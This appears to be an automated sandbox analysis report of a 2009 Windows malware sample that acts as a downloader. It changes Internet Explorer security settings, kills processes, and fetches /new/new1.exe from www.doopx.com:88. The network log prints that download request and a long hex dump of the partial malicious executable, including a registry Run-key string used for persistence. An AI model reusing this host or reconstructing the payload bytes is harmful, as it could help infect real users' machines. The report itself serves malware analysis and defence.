Analysis Report for fc045d48179c5d945d3fad199cd6a273

Comment on this report

Summary:

Description	Risk
Changes security settings of Internet Explorer: This system alteration could seriously affect safety surfing the World Wide Web.
Performs File Modification and Destruction: The executable modifies and destructs files which are not temporary.
Spawns Processes: The executable produces processes during the execution.
Performs Registry Activities: The executable reads and modifies registry values. It may also create and monitor registry keys.

Table of Contents
expand all	collapse all
General information sample.exe C:\sample.exe Primary Analysis Subject General Information a) Registry Activities b) File Activities c) Windows Service Activities d) Process Activities services.exe C:\WINDOWS\system32\services.exe NtConnectPort(\RPC Control\ntsvcs was called. General Information a) Registry Activities b) File Activities c) Process Activities taskkill.exe C:\WINDOWS\system32\taskkill.exe Started by sample.exe General Information a) Registry Activities b) File Activities c) Process Activities taskkill.exe C:\WINDOWS\system32\taskkill.exe Started by sample.exe General Information a) Registry Activities b) File Activities c) Process Activities ~1e378e.tmp C:\DOCUME~1\user\LOCALS~1\Temp\~1e378e.tmp Started by sample.exe General Information a) Registry Activities b) File Activities c) Process Activities

1. General Information

	- Information about Anubis' invocation

Time needed:	242 s
Report created:	03/20/09, 15:38:18 UTC
Termination reason:	Timeout
Program version:	1.67.0

1.a) - Network Activity

	- HTTP Conversations:

From ANUBIS:1033 to 58.253.68.49:88 - [www.doopx.com:88]
Request: GET /ook.txt
Response: 200 "OK"
Request: GET /new/new1.exe
Response: 200 "OK"

	- Unknown UDP Traffic:

from ANUBIS:1025 to 192.168.0.1:53

State: Normal establishment and termination - Transferred outbound Bytes: 62 - Transferred inbound Bytes: 214

	- Unknown TCP Traffic:

from ANUBIS:1034 to 58.253.68.49:88

State: Connection established, not terminated - Transferred outbound Bytes: 274 - Transferred inbound Bytes: 19969

Data sent:

    
4745 5420 2f6e 6577 2f6e 6577 312e 6578    GET /new/new1.ex
6520 4854 5450 2f31 2e31 0d0a 4163 6365    e HTTP/1.1..Acce
7074 3a20 2a2f 2a0d 0a55 412d 4350 553a    pt: */*..UA-CPU:
2078 3836 0d0a 4163 6365 7074 2d45 6e63     x86..Accept-Enc
6f64 696e 673a 2067 7a69 702c 2064 6566    oding: gzip, def
6c61 7465 0d0a 5573 6572 2d41 6765 6e74    late..User-Agent
3a20 4d6f 7a69 6c6c 612f 342e 3020 2863    : Mozilla/4.0 (c
6f6d 7061 7469 626c 653b 204d 5349 4520    ompatible; MSIE 
372e 303b 2057 696e 646f 7773 204e 5420    7.0; Windows NT 
352e 313b 202e 4e45 5420 434c 5220 312e    5.1; .NET CLR 1.
312e 3433 3232 3b20 2e4e 4554 2043 4c52    1.4322; .NET CLR
2032 2e30 2e35 3037 3237 3b20 2e4e 4554     2.0.50727; .NET
2043 4c52 2033 2e30 2e30 3435 3036 2e33     CLR 3.0.04506.3
303b 2049 6e66 6f50 6174 682e 3129 0d0a    0; InfoPath.1)..
486f 7374 3a20 7777 772e 646f 6f70 782e    Host: www.doopx.
636f 6d3a 3838 0d0a 436f 6e6e 6563 7469    com:88..Connecti
6f6e 3a20 4b65 6570 2d41 6c69 7665 0d0a    on: Keep-Alive..
0d0a                                       ..

Data received:

    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a43 6f6e 7465 6e74 2d4c 656e 6774 683a    .Content-Length:
2031 3937 3034 0d0a 436f 6e74 656e 742d     19704..Content-
5479 7065 3a20 6170 706c 6963 6174 696f    Type: applicatio
6e2f 6f63 7465 742d 7374 7265 616d 0d0a    n/octet-stream..
4c61 7374 2d4d 6f64 6966 6965 643a 2057    Last-Modified: W
6564 2c20 3138 204d 6172 2032 3030 3920    ed, 18 Mar 2009 
3138 3a34 393a 3536 2047 4d54 0d0a 4163    18:49:56 GMT..Ac
6365 7074 2d52 616e 6765 733a 2062 7974    cept-Ranges: byt
6573 0d0a 4554 6167 3a20 2230 6532 3963    es..ETag: "0e29c
3534 6661 6137 6339 313a 3266 3422 0d0a    54faa7c91:2f4"..
5365 7276 6572 3a20 4d69 6372 6f73 6f66    Server: Microsof
742d 4949 532f 362e 300d 0a58 2d50 6f77    t-IIS/6.0..X-Pow
6572 6564 2d42 793a 2041 5350 2e4e 4554    ered-By: ASP.NET
0d0a 4461 7465 3a20 4672 692c 2032 3020    ..Date: Fri, 20 
4d61 7220 3230 3039 2031 353a 3336 3a34    Mar 2009 15:36:4
3220 474d 540d 0a0d 0a4d 5a50 0001 0000    2 GMT....MZP....
0002 0000 00ff ff00 00b8 0000 0000 0000    ................
000a 0000 0000 0000 000e 1fba 0e00 b409    ................
cd21 b801 4ccd 2100 0000 0000 0000 0000    .!..L.!.........
0000 0000 2440 0000 0050 4500 004c 0105    ....$@...PE..L..
0064 e9c0 4900 0000 0000 0000 00e0 000e    .d..I...........
030b 0106 0000 1000 0000 6000 0000 0000    ..........`.....
00dd 8000 0000 1000 0000 2000 0000 0040    .......... ....@
0000 1000 0000 0200 0004 0000 0000 0000    ................
0004 0000 0000 0000 0000 c000 0000 0200    ................
0000 0000 0002 0000 0000 0010 0000 1000    ................
0000 0010 0000 1000 0000 0000 0010 0000    ................
0000 0000 0000 0000 0000 8000 00e0 0000    ................
0000 9000 0064 0000 0000 0000 0000 0000    .....d..........
0000 0000 0000 0000 0000 b000 000c 0200    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000                        ........

Data received:

    
0000 0000 0000 0000 0050 8000 0018 0000    .........P......
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 002e 7465 7874 0000    ..........text..
0000 7000 0000 1000 0000 3200 0000 0200    ..p.......2.....
0000 0000 0000 0000 0000 0000 00e0 0000    ................
e02e 6461 7461 0000 008b 0300 0000 8000    ..data..........
0000 0400 0000 3400 0000 0000 0000 0000    ......4.........
0000 0000 00e0 0000 e02e 7273 7263 0000    ..........rsrc..
0064 0000 0000 9000 0000 0200 0000 3800    .d............8.
0000 0000 0000 0000 0000 0000 0040 0000    .............@..
c059 3854 3372 6a32 302a 0800 0000 a000    .Y8T3rj20*......
0000 0a00 0000 3a00 0000 0000 0000 0000    ......:.........
0000 0000 0040 0000 602e 7265 6c6f 6300    .....@..`.reloc.
000c 0200 0000 b000 0000 0400 0000 4400    ..............D.
0000 0000 0000 0000 0000 0000 0040 0000    .............@..
4207 00ca 3000 0051 0053 5556 576a 00ff    B...0..Q.SUVWj..
1500 2020 4000 8bf0 8b44 0024 1825 ffff    ..  @....D.$.%..
0000 6800 2430 4000 5056 ff15 401c 2e81    ..h.$0@.PV..@...
5ff8 5f67 f025 e0d5 b595 357c 6502 1890    _._g.%....5|e...
2650 082c 5250 ff15 148a 4881 5ed8 8e94    &P.,RP....H.^...
1026 c107 40c2 a106 70b5 88fd af52 41c3    .&..@...p....RA.
016a 0221 6000 0300 6800 0000 4057 ff15    .j.!`...h...@W..
4164 ea32 e8ff 5f87 2007 2033 c076 d0c8    Ad.2.._. . 3.v..
4402 a166 07f0 02c0 3a07 1068 de0a 0270    D..f....:..h...p
b998 61e0 07aa a102 b801 9e00 4803 9090    ..a.........H...
81ec 8403 0004 008d 4424 04b1 1068 04ab    ........D$...h..
3000 d50b c102 1d2d dc91 0082 3660 10d2    0......-....6`..
8012 0101 18f5 4f54 9d00 f240 08c8 018b    ......OT...@....
3d60 284c f104 8046 d8ff ff4f 60f5 7fdd    =`(L...F...O`...
4855 0221 d518 4148 02e2 0968 7c02 a880    HU.!..AH...h|...
ba00 4062 1a1d 1710 56ff d30e 8b8c 2498    ..@b....V.....$.
f2a0 7bb2 01fc 295b 742a 9e22 179e 8fd0    ..{...)[t*."....
0c21 0998 cb10 81c4 8d10 9f00 8b4c 2404    .!...........L$.
088b 5424 04a3 0008                        ..T$....

Data received:

    
6a84 9510 6806 0002 ca03 1085 20f5 5f41    j...h....... ._A
5013 f362 b568 4147 4261 0838 1e60 060c    P..b.hAGBa.8.`..
2140 5095 0214 566a 0168 8010 f55f 01c0    !@P...Vj.h..._..
1254 240c ac62 8040 015e b200 3081 ec02    .T$..b.@.^..0...
0008 0000 b900 0f00 3300 c056 578d bc24    ........3..VW..$
0804 8125 0000 1000 00f3 ab2c 22d0 c847    ...%.......,"..G
c230 bf7a 05c0 300e 0397 6177 0108 6800    .0.z..0...aw..h.
2280 0b4a 44b8 5103 a312 542a c095 3837    "..JD.Q...T*..87
20f5 6f3d 0681 8661 0166 5016 a005 8d94     .o=...a.fP.....
b492 0601 64b8 2652 084c 1783 0411 128c    ....d.&R.L......
3424 04b8 6109 3c8a 0320 8549 2768 2c08    4$..a.<.. .I'h,.
d113 0088 ce39 5801 3048 0c11 48fc 05d1    .....9X.0H..H...
0726 04b9 0c40 10c8 cea1 07a3 6070 5630    .&...@......`pV0
0632 6575 3503 4cd8 0680 8286 bbd0 08f1    .2eu5.L.........
5f81 0436 0683 1215 32f2 5fc1 a6a8 3c28    _..6....2._...<(
680c 5720 1577 2044 0024 2850 6a6b e8ea    h.W .w D.$(Pjk..
fc00 ffff 83c4 0885 c00f 3284 ce85 026c    ..........2....l
82ce 2c01 8309 c404 6800 5ea0 4690 1f60    ..,.....h.^.F..`
6810 ffff 155c 7060 118b 42f8 3302 1f00    h....\p`..B.3...
0f00 2704 58d2 2630 4e41 854c 8903 c200    ..'.X.&0NA.L....
0588 12f0 85f6 747d 558b 242d 4c18 8086    ......t}U.$-L...
4609 56ff 12d5 6860 0e31 4aa7 00ff 14d5    F.V...h`.1J.....
a378 0c51 8111 8b35 6878 5944 3100 188b    .x.Q...5hxYD1...
02ff d685 08c0 5d74 1122 c244 4201 dc2f    ......]t.".DB../
2012 75ef 53ff 1548 9c52 f05f 6117 fcf0     .u.S..H.R._a...
41b1 5883 380e 8106 7d90 0d60 8dce 9f9c    A.X.8...}..`....
3c61 315f 5ec7 0581 c45f 1110 c210 007f    <a1_^...._......
0110 0c00 0000 4b45 524e 454c 3332 002e    ......KERNEL32..
646c 6c00 5369 7a00 656f 6652 6573 6f75    dll.Siz.eofResou
0072 6365 004c 6f63 6b91 1818 4686 6146    .rce.Lock...F.aF
696e 1806 1004 7054 46d7 f446 0650 c756    in....pTF..F.P.V
8614 e646 c606 0802 5265 6164 4669 6c04    ...F....ReadFil.
6500 5365 740e 01f5 6690 e646 5726 0775    e.Set...f..FW&.u
28e1 0412 d646 056c                        (....F.l

Data received:

    
7374 7263 1061 7441 5415 4447 2727 9026    strc.atAT.DG''.&
5647 5736 6733 6c01 656e 4100 4d6f 7664    VGW6g3l.enA.Movd
2252 8407 466d 7069 ec32 0590 3747 57d6    "R..Fmpi.2..7GW.
4694 2607 5036 46f7 2697 1704 0050 e5d6    F.&.P6F.&....P..
1606 6795 5686 71f7 6416 0062 0450 726f    ..g.V.q.d..b.Pro
0063 4164 6472 6573 7383 8920 4c69 6272    .cAddress.. Libr
6156 6103 0043 7572 7265 6e74 5421 6872    aVa..CurrentT!hr
6300 4964 004d 788a 35a4 0274 f0e2 0270    c.Id.Mx.5..t...p
696e 4267 4b00 6c65 6570 3018 c400 7025    inBgK.leep0...p%
9746 319e 4155 06d0 0607 1546 8716 04a0    .F1.AU.....F....
30c4 f636 f711 0450 5501 e050 3555 24d5    0..6...PU..P5U$.
1cd4 10b1 0110 0674 c607 0084 ffff ff41    .......t.......A
0444 5641 5049 3a24 5536 7476 1160 15c6    .DVAPI:$U6tv.`..
56f7 0dc2 018f dcb3 5496 e751 b6c1 01a9    V.......T..Q....
0280 00b0 8847 b0f0 0f45 0750 b408 85b0    .....G...E.P....
0833 000f b022 bfe8 be88 04b1 02d0 4c37    .3..."........L7
b308 c530 200f 30e0 bf02 dcba 733f 0751    ...0 .0.....s?.Q
b288 cd10 1e8b d083 00ea 0803 d666 ad0a    .............f..
e400 740b 25ff 0f00 0003 00c3 03c5 2908    ..t.%.........).
3bf2 7304 d8eb e9fb 0655 0058 0560 e60a    ;.s......U.X.`..
8019 0140 0601 4000 0c58 0300 0ac0 756f    ...@..@..X....uo
402d 3117 8038 4d75 658b 0078 3c03 f82b    @-1..8Mue..x<..+
c066 8b00 4714 03f8 83c7 3fe8 6253 6c30    .f..G.....?.bSl0
3905 80ee af01 0b04 c074 3ee8 7010 6095    9........t>.p.`.
5620 4757 17c6 b620 4097 24c0 0000 854e    V GW... @.$....N
9041 a003 2050 5454 7905 783f 1bd0 1c00    .A.. PTTy.x?....
010b 0086 7880 7884 8205 0542 05a5 02ff    ....x.x....B....
d358 8bfe 00ad 83f8 ff74 3d03 f840 56a2    .X.......t=..@V.
b288 cdaa 000c 2b00 8068 f45f 672f 0174    ......+..h._g/.t
00e1 3c20 7604 4e56 eb40 0911 00ad 4ec6    ..< v.NV.@....N.
0600 5046 53b6 b22a 036c 0442 5047 60bf    ..PFS..*.l.BPG`.
7e8d 4e2e 075f 8100 c7de feff ffb0 e9aa    ~.N.._..........
21b8 2e1d 05ab 61e9 bcad 0742 02bf 0aff    !.....a....B....
2552 698b 0125 6056                        %Ri..%`V

Data received:

    
0a00 f0ff e117 776f 7771 7711 6572 7422    ......wowqw.ert"
5800 d036 e78e 0508 2e64 6174 2c52 8657    X..6.....dat,R.W
16e6 c200 2cd0 94d5 3485 0100 0053 4f46    ....,...4....SOF
5457 4152 0045 5c4d 6963 726f 7304 6f66    TWAR.E\Micros.of
745c 5712 5ff0 7607 32c7 25c1 4556 6572    t\W._.v.2.%.EVer
7369 026f 6e5c 5275 6ebc c005 c800 486f    si.on\Run.....Ho
6f6b 6f66 66e1 1c03 1500 ffef eed0 a405    okoff...........
0960 a60a d53a 9be2 091b b862 2e04 24e8    .`...:.....b..$.
f211 d00c 00e0 f0a1 eb00 409b d00c 1082    ..........@.....
1bc0 d41c 4285 0690 3607 0227 f776 2607    ....B...6..'.v&.
10d6 0632 16e6 e6f6 0640 0722 5606 2257    ...2.....@."V."W
e706 0092 e606 42f4 3405 02d0 f646 56e6    ......B.4....FV.
d2d0 a000 44d2 0054 6e44 891d 7a02 a2bf    ....D..TnD..z...
c850 223b f48b a5a0 2ca4 ca00 c338 e98b    .P";....,....8..
a488 3cb2 bf38 c801 4938 f122 8ba2 1ce2    ..<..8..I8."....
bf08 ca01 5218 6963 68ac d114 0555 0400    ....R.ich....U..
00c0 1430 0050 8b5e 0c96 dd23 0110 e000    ...0.P.^...#....
0e21 0b59 01d2 9800 0303 be9b 0000 ca00    .!.Y............
5bd7 0c00 0b27 0001 c125 0699 70de 3101    [....'...%..p.1.
101c 0500 cf4c 7803 33e0 3cc2 5118 4310    .....Lx.3.<.Q.C.
0e00 0007 6f2d 1b3d 004e aa01 f006 74e2    ....o-.=.N....t.
0000 c78a a600 f03f 5550 5875 126d 325d    .......?UPXu.m2]
41eb 1172 0023 430b e09c 1003 23b4 b1db    A..r.#C.....#...
2fa1 c2f9 00ed 069c 2113 27d6 3881 ca18    /.......!.'.8...
2e9c 0eec 71f3 ff8a 0033 2e30 2031 001d    ....q....3.0 1..
0621 0d09 0209 000f 96ab 5aeb ee93 ac48    .!........Z....H
2081 0efe 26f9 0462 0000 0026 0100 8bff     ...&..b...&....
feb7 ff36 81ec b6b6 a15a 0b04 cab8 e287    ...6.....Z......
0b68 9f08 ffff ffff 0cf3 ab8d 44c7 fe7d    .h..........D..}
fb24 1050 ff15 0a50 108d 4c15 0060 4c51    .$.P...P..L..`LQ
0f0c 8d23 bfc7 9654 520a 088b f018 3c56    ...#...TR.....<V
046f 7be7 da8b 9433 4e2f 0851 6a00 0152    .o{....3N/.Qj..R
04d9 ef1f fbff d056 8bf8 1f00 8bc7 5f5e    .......V......_^
81c4 71c3 9000 b964                        ..q....d

Data received:

    
48b6 7f00 080c 422e 792e 0868 08d9 663e    H.....B.y..h..f>
645c 8c24 0c73 5174 6428 ec4c 006f 8475    d\.$.sQtd(.L.o.u
e692 2374 18f6 1445 ba37 9b76 10f9 131c    ..#t...E.7.v....
402e 0afb 0151 528f 9494 cdbe 978d 0752    @....QR........R
0f89 7204 d821 8f8f a81c 4172 0101 b8b5    ..r..!....Ar....
1576 611f 5173 a33b d3ee bf4b 1053 5556    .va.Qs.;...K.SUV
85c9 57b8 6600 c705 0600 76ed f676 e142    ..W.f.....v..v.B
8b74 d08b 6ccf 2bee e818 359c 8d73 3fd6    .t..l.+...5..s?.
fe33 db8a 042e 8a1e 480f 3bfb 751d 8b2c    .3......H.;.u..,
3f1e db76 bf20 4046 3bc1 890b 72d5 5b5d    ?..v. @F;...r.[]
465b 59c3 5dc2 3ad7 300c 0790 006a 57ed    F[Y.].:.0....jW.
bfdb 7636 148b b218 5d20 b350 c1e0 0803    ..v6....] .P....
d589 0e75 1ffb ed14 c680 3767 d881 32d2    ...u......7g..2.
08d9 ec88 9006 daba c746 8e0c db04 dc05    .........F......
dd88 9818 dec8 9163 47df 5306 e051 e152    .......cG.S..Q.R
1c39 72e4 e256 e357 e455 e58d b123 478e    .9r..V.W.U...#G.
e684 e724 e81c 5e91 9191 93e9 eaeb ec3f    ...$..^........?
76e4 f6ed 8b8d 880c 71d8 eec4 19ef b268    v.......q......h
8bd9 6d6c f763 29f0 c1eb 0888 1f67 f118    ..ml.c)......g..
f216 b295 b1ed c601 5813 100d f30a 18fb    ........X.......
3137 36f4 2df5 f275 71d9 5d8b da40 1d6b    176.-..uq.]..@.k
df19 f621 f710 19da 5f1f 3be6 8e06 db5e    ...!...._.;....^
4509 dc5a 06dd 59c1 eab1 b163 674b f80f    E..Z..Y....cgK..
de5b 3ff9 0cf9 1cfb d8df 5806 e081 33d2    .[?.......X...3.
1ce1 c471 e2ec d863 1fe3 0433 ff0e e43b    ...q...c...3...;
eac5 fac3 0efe bfb9 7de5 be0e 0094 7e10    ........}.....~.
1c8a 1c17 881c 3146 473b fd7c f46b ff2e    ......1FG;.|.k..
18ce 8884 30f4 6846 8bd1 76a0 6d8b 7d6c    ....0.hF..v.m.}l
8c0d 465f 8894 0814 4615 59b0 5bb0 100c    ..F_....F.Y.[...
0ae9 1820 3510 300e e3d9 c301 c3cf 3282    ... 5.0.......2.
11a3 f333 d6d4 1238 422e 4cc4 74b4 924e    ...3...8B.L.t..N
e714 6b64 5b47 2394 607f 750c 20dd 3dc6    ..kd[G#.`.u. .=.
fe1d de14 c1e3 0857 b940 0093 bb7c bf7b    .......W.@...|.{
c7b6 908b 9b20 9f1c                        ..... ..

Data received:

    
5750 56b2 030c 83c4 0c85 fea1 e1e3 c075    WPV............u
05ca c31b 242f 5157 5256 555c 737f f91d    ....$/QWRVU\s...
7c14 83f8 0174 071e 4220 d62c bfdf 5a1c    |....t..B .,..Z.
556a 0457 3a05 6c10 0cf9 dddf 182c 202b    Uj.W:.l......, +
b506 e955 558d 836c d3f8 85c2 4b07 c88b    ...UU..l....K...
d03f 6046 0188 4e02 876d 2f6c 53c1 e84b    .?`F..N..m/lS..K
5603 560f 043f f7eb 4ef2 b7d8 bf1b c05d    V.V..?..N......]
f7d8 5b8b 1dd8 20c5 b71d b66e 2d06 1cc7    ..[... ....n-...
352a 493d 06dd b1f6 5818 6968 d007 0bfd    5*I=....X.ih....
14a1 65cc 8b2d 6f6f 8274 e7a0 0889 6084    ..e..-oo.t....`.
de21 04b3 5377 b709 8c16 d0c7 0520 c8ed    .!..Sw....... ..
397b 5be8 6e07 6140 0487 3cd5 1e0f 8586    9{[.n.a@..<.....
189b eccd 0181 e682 40ff d729 3810 494e    ........@..)8.IN
06e4 9a30 d6c9 2139 922c 1c89 602c bb58    ...0..!9.,..`,.X
0b0b 65fd 0d3c 0821 c964 4d4a d399 1452    ..e..<.!.dMJ...R
4bbe cd59 b801 eb1a 1b08 01d9 9993 0a02    K..Y............
cf60 fc36 79c9 f7dd feff ff13 f484 c9de    .`.6y...........
2087 ec4b 1fe4 d960 d4db 95a5 6cbc b7e9     ..K...`....l...
0706 d711 1e84 d8af b80c 1045 3e5c f920    ...........E>\. 
4b5d 638b b41f 0e57 0704 baef 8cc6 1c71    K]c....W.......q
d528 8ddf b56a 0e18 f8cd 01bd 997c 8d8e    .(...j.......|..
f78b 9d07 952c 2a7d 4024 2397 911a ed8b    .....,*}@$#.....
e803 8923 9885 f60b 53d3 ee75 0650 7b09    ...#....S..u.P{.
7155 184e cefb ec52 5343 2010 6a13 63b0    qU.N...RSC .j.c.
8bd8 196b 38e9 8385 6148 7424 3161 8d8f    ...k8...aHt$1a..
dded 178b 85db 8d74 5238 148d e5a0 e3ac    .......tR8......
6b27 7a52 3a90 2f38 6ddb 9f71 b771 94c6    k'zR:./8m..q.q..
4404 208d d67b d638 c99d 0d02 2410 31ae    D. ..{.8....$.1.
18c1 be52 3204 7afd c333 8760 9362 2e08    ...R2.z..3.`.b..
181f 76dc 60c9 1011 6157 89de 67d4 ee83    ..v.`...aW..g...
170c 71c3 5751 04da 1d6b ba18 031c 2063    ..q.WQ...k.... c
2c50 220e 7ced e119 4605 1872 e8c7 8c82    ,P".|...F..r....
b73c dda4 d513 e920 50d6 4733 cf9a 3f0b    .<..... P.G3..?.
8960 5154 174c 525b                        .`QT.LR[

Data received:

    
2314 709f 1b50 173c 0789 6521 d676 5d89    #.p..P.<..e!.v].
4c7a 073f bc58 616c b001 1454 9ad0 220d    Lz.?.Xal...T..".
38bf 3bf6 5833 c907 5ca3 3314 890d 0000    8.;.X3..\.3.....
883b 32f6 eb58 6611 1866 12c4 fca2 114f    .;2..Xf..f.....O
32db b71a 8810 c617 1557 8d84 97db cd62    2........W.....b
5d81 1108 6cc9 6d14 3317 4e0b 2210 1128    ]...l.m.3.N."..(
5fd8 628f de28 8d94 2eb7 d7eb 3bf3 750d    _.b..(......;.u.
2d58 6c08 4a27 4bec cfff 1fb2 d740 8d4e    -Xl.J'K......@.N
ff33 c03b cb7e 28b2 0d38 9404 75cf c5be    .3.;.~(..8..u...
fb18 80bc 0421 080a 750e 889c 1206 10c3    .....!..u.......
3370 8940 c67c da57 12fe ddcd 0a06 084d    3p.@.|.W.......M
0672 83c6 02e5 e4f9 9eb5 9434 1f52 1414    .r.........4.R..
b319 19ec 8d74 061e 8450 88c0 0dd9 96bd    .....t...P......
061e 5d34 d092 343b 8306 6a69 d66a cd88    ..]4..4;..ji.j..
a69b f5fa 5d7d 81f6 3840 a313 256a 0675    ....]}..8@..%j.u
22a1 7068 7fe1 0bac 3bc3 5f0f 95c2 e64e    ".ph....;._....N
428b 0da3 946e f1fc a940 9012 765d 158f    B....n...@..v]..
c15b 43d3 c308 04fa 08a3 0600 02c4 9e6c    .[C............l
c030 ad00 ec36 568a c65d 901e 1c97 300c    .0...6V..]....0.
4050 fa07 1318 21a4 02d0 0797 4507 bf38    @P....!.....E..8
029c 035e e483 6cb3 47d3 ec08 ac04 4a27    ...^..l.G.....J'
6f10 7624 4bd3 0c00 1930 2468 5fd3 1c18    o.v$K....0$h_...
1404 6a04 238e 6193 fddf 017c 4251 6a21    ..j.#.a....|BQj!
8726 8365 6c0f 2855 bb42 8197 7c57 33ed    .&.el.(U.B..|W3.
32aa 4218 50ba b2dd 6e08 2bc6 617e 4613    2.B.P...n.+.a~F.
f608 2e6f 17f8 ff15 8a14 3e8d 0c2e 3a14    ...o......>...:.
0128 5746 163b f07d febf 9ffb 17eb e757    .(WF.;.}.......W
4534 82f0 5134 3be8 7d09 ebc9 5f8b c583    E4..Q4;.}..._...
d81d 0ff3 4983 c8ff 07c0 7956 d9c4 cffc    ....I.....yV....
00cb 0c01 17dc eea9 564c ac9e 0ccc 9ba2    ........VL......
ff7e 89c8 d80b 5b74 3007 16a8 8c9c fc26    .~....[t0......&
5c18 dd54 8d47 0150 5630 b39a ebb8 3701    \..T.G.PV0....7.
b3b0 4ceb 3602 b30e 58f9 61a4 e90a 5c5d    ..L.6...X.a...\]
2c32 0304 4568 f4d3                        ,2..Eh..

Data received:

    
54c6 1688 551f acce 183f f745 6b00 80e5    T...U....?.Ek...
11c0 0a3f 9851 e81a ba7e 0590 5030 308f    ...?.Q...~..P00.
340c 84b9 ee49 1a44 38a8 b90b 0abe 1774    4....I.D8......t
bf61 a296 f250 f3a5 66a5 a4d4 1459 bb75    .a...P..f....Y.u
d466 8e4f e1d8 8806 68e9 c86f db28 b78d    .f.O....h..o.(..
3d28 6aff 5053 a46a b5cd 3a33 15ce 0fa0    =(j.PS.j..:3....
e11c c3da b00c d6c6 1052 e97b d071 201c    .........R.{.q .
2db0 565a 087b 5b7a e1ab fdf6 c607 8b07    -.VZ.{[z........
0430 c647 73fb ddbf 707e 4153 8d6f 018b    .0.Gs...p~AS.o..
c6b9 0a31 99f7 f9b8 6766 00fb 2dfe 5b28    ...1....gf..-.[(
daf7 eec1 fa02 8bc2 1b1f 03d0 8bf2 8ded    ................
6617 0757 559c 3e8c 80c3 3048 6ced d9f6    f..WU.>...0Hl...
881f 7fc6 6c57 1cc6 04e5 7bc3 1847 e064    ....lW....{..G.d
8f18 537f 83b8 29e8 1a72 fd18 f7de 1bf6    ..S...)..r......
de77 5704 1430 5d62 1062 1801 3413 6b36    .wW..0]b.b..4.k6
be7f 301e b451 81c6 f0b3 9b0f 2812 8d73    ..0..Q......(..s
499c f4d3 0e24 6203 59dc a239 c746 f06a    I....$b.Y..9.F.j
0ff1 b02d 5a2c 3d2b dc57 14ac b6ee 1488    ...-Z,=+.W......
935b 0a18 0e38 74d1 8690 2672 10b4 4f6d    .[...8t...&r..Om
ccd0 5dec 6438 07f1 c4fe d75e 630c 34fc    ..].d8.....^c.4.
0b10 c085 ff74 1256 1762 db05 a6f0 1678    .....t.V.b.....x
f053 b45e 5f1a d2b2 5768 559c 0bb7 fe36    .S.^_...WhU....6
250d 318b 421c d376 19bd b1b5 3af6 7f5f    %.1.B..v....:.._
3bc6 5e73 0d2b c11a c403 b21b 24ac b41c    ;.^s.+......$...
c2a7 8e8f 0460 d755 9014 f0c9 7588 c834    .....`.U....u..4
f62b 7cc9 891c 9e0c cc66 0d20 83ee efb7    .+|......f. ....
6e66 0ed0 880d 22b9 168b bf7e 2d76 47b7    nf...."....~-vG.
32a2 14d2 4cab 66ab 1444 0ed9 187c 168c    2...L.f..D...|..
2a0c 15e6 66e8 a446 c616 10ff 19bc 16e1    *...f..F........
f9c6 c388 1712 a1b8 151b 6315 dc18 957a    ..........c....z
ecc8 2610 14e3 c316 cc85 7d45 0077 f9ee    ..&.......}E.w..
78a0 eb26 387c 4f08 510a 60b9 1c0c 5850    x..&8|O.Q.`...XP
0c62 5cd1 be4b ea4e 8014 2774 13d7 ef15    .b\..K.N..'t....
c3ab 17a0 1363 3c38                        .....c<8

Data received:

    
74ac 6126 4835 ad33 ec4e 4c6a f6c1 8414    t.a&H5.3.NLj....
6e32 870c f62e 6b12 e78b 5584 5247 84cd    n2....k...U.RG..
12c8 1c50 7185 99ac cbd5 1801 7851 8454    ...Pq.......xQ.T
e472 d23c 2452 844c 5051 1393 3a99 9484    .r.<$R.LPQ..:...
f3db 0e0b b632 d251 4b0c 01f6 1666 8883    .....2.QK....f..
5d28 e451 72d3 62f4 e334 2899 dcb6 c27e    ](.Qr.b..4(....~
ae31 4296 606a 5851 c608 ffff ffff c868    .1B.`jXQ.......h
c603 dba6 1a80 880d 229b 5c5f 6a6e c420    ........".\_jn. 
8a52 f901 3dce e23b 74e4 172c c44e 29cf    .R..=..;t..,.N).
ae3d ee0b 86f8 68df 9a0b 84d0 8c1a 2352    .=....h.......#R
2774 3e0c 164b 2ef9 c54d 38c0 5140 b309    't>..K...M8.Q@..
79c9 85e4 8588 94b6 ec6e 187c 3cb4 4c94    y........n.|<.L.
8f42 01d3 790e e49b 501c a825 8c33 0fe4    .B..y...P..%.3..
1951 9ce6 0056 853c 9001 90c9 00e4 421e    .Q...V.<......B.
c884 ac00 780d d881 bd7f 7152 6c18 5881    ....x.....qRl.X.
0dd8 814e 6018 1d4a d960 0ed8 54be 8e70    ...N`..J.`..T..p
157c e62e bf20 2f7c e62c 4ce9 15f5 1990    .|... /|.,L.....
01f9 218c 8c44 0664 4026 3232 3c01 79c9    ..!..D.d@&22<.y.
437b d87b d85e 7260 9130 d624 7e22 1990    C{.{.^r`.0.$~"..
97ec 3a7d 407d 401c 3260 0336 f810 3a1f    ..:}@}@.2`.6..:.
ec80 f041 08eb 6e17 61fc 37d9 967d 0861    ...A..n.a.7..}.a
f4eb 36aa 37e8 ec0e 9201 24e0 0b87 bc38    ..6.7.....$....8
fbce 8e60 2823 d30b 1423 d3eb 2a46 2714    ...`(#...#..*F'.
5be9 4c08 d832 a0e3 d0c0 381b 462e 0326    [.L..2....8.F..&
c0c4 f400 d318 3370 4aeb b19a 2250 f4e0    ......3pJ..."P..
c1b0 0756 6c6f 7584 38dd 138b 48b8 e900    ...Vlou.8...H...
0f59 3a5b c784 ea6d 4906 9a84 1cf8 d242    .Y:[...mI......B
ef0d 7ed9 5896 c974 5d8a c537 973e 0c18    ..~.X..t]..7.>..
c88a 0d19 4a83 e207 d580 ff7a 15da 4c8d    ....J......z..L.
9cca 80c1 2044 ab8d 4789 2e25 5162 0179    .... D..G..%Qb.y
3218 8960 d1fc 3ff8 c3a8 5f8a c3c6 05c1    2..`..?..._.....
0024 07c1 eb03 0441 bbaf ba5d 4e88 1d10    .$.....A...]N...
21b2 20b7 0004 796b 673b 9215 b291 d274    !. ...ykg;.....t
1cac 7006 1916 17ca                        ..p.....

Data received:

    
87f8 3edd 6d89 1f8a c149 e9c1 3043 1e41    ..>.m....I..0C.A
06b2 9121 1f48 144c 462e 9215 1c1d 9810    ...!.H.LF.......
6b49 b6c0 50fd 878d 2e19 8b8b 045b 4010    kI..P........[@.
eb0a 8b8c 36f6 c79e 0b41 1c5f 0c84 c975    ....6....A._...u
1004 4b0c 4542 2e19 4b19 0d0d 920b b9e4    ..K.EB..K.......
0e0e 0f90 4b2e e40f 1010 be16 a5b9 1164    ....K..........d
